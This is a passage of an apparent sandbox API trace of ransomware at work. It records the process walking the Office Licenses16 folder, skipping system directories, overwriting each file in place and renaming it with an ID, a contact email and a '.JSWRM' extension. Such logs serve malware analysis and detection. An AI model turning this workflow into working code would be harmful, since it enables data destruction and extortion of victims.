0x24ba88 [0106.438] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0106.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.438] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0106.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0106.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0106.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.439] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7bc4076, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7bc4076, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7c82c0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x258b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_KMS_Client-ul.xrm-ms", cAlternateFileName="ON4F5D~1.XRM")) returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned -1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0106.439] lstrcmpiW (lpString1="OneNoteVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0106.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0106.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0106.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0106.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0106.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0106.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.440] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9611) returned 1 [0106.440] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0106.440] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0106.442] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.442] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0106.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.443] CloseHandle (hObject=0x45c) returned 1 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0106.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0106.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0106.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0106.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0106.444] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7b77c25, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7b77c25, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7c5ca64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2983, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_MAK-pl.xrm-ms", cAlternateFileName="ON56E0~1.XRM")) returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.444] lstrcmpiW (lpString1="OneNoteVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0106.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0106.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0106.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0106.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-pl.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240f20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0106.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0106.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0106.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.445] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10627) returned 1 [0106.445] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0106.445] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0106.447] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.448] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0106.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.448] CloseHandle (hObject=0x45c) returned 1 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0106.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0106.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0106.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0106.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0106.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0106.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0106.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0106.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.449] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7b51982, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7b51982, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7c105e1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteVL_MAK-ppd.xrm-ms", cAlternateFileName="ON9CC8~1.XRM")) returned 1 [0106.449] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.450] lstrcmpiW (lpString1="OneNoteVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteVL_MAK-ppd.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240f20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotevl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.451] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6798) returned 1 [0106.451] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0106.451] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0106.493] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.493] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0106.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0106.494] CloseHandle (hObject=0x45c) returned 1 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0106.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 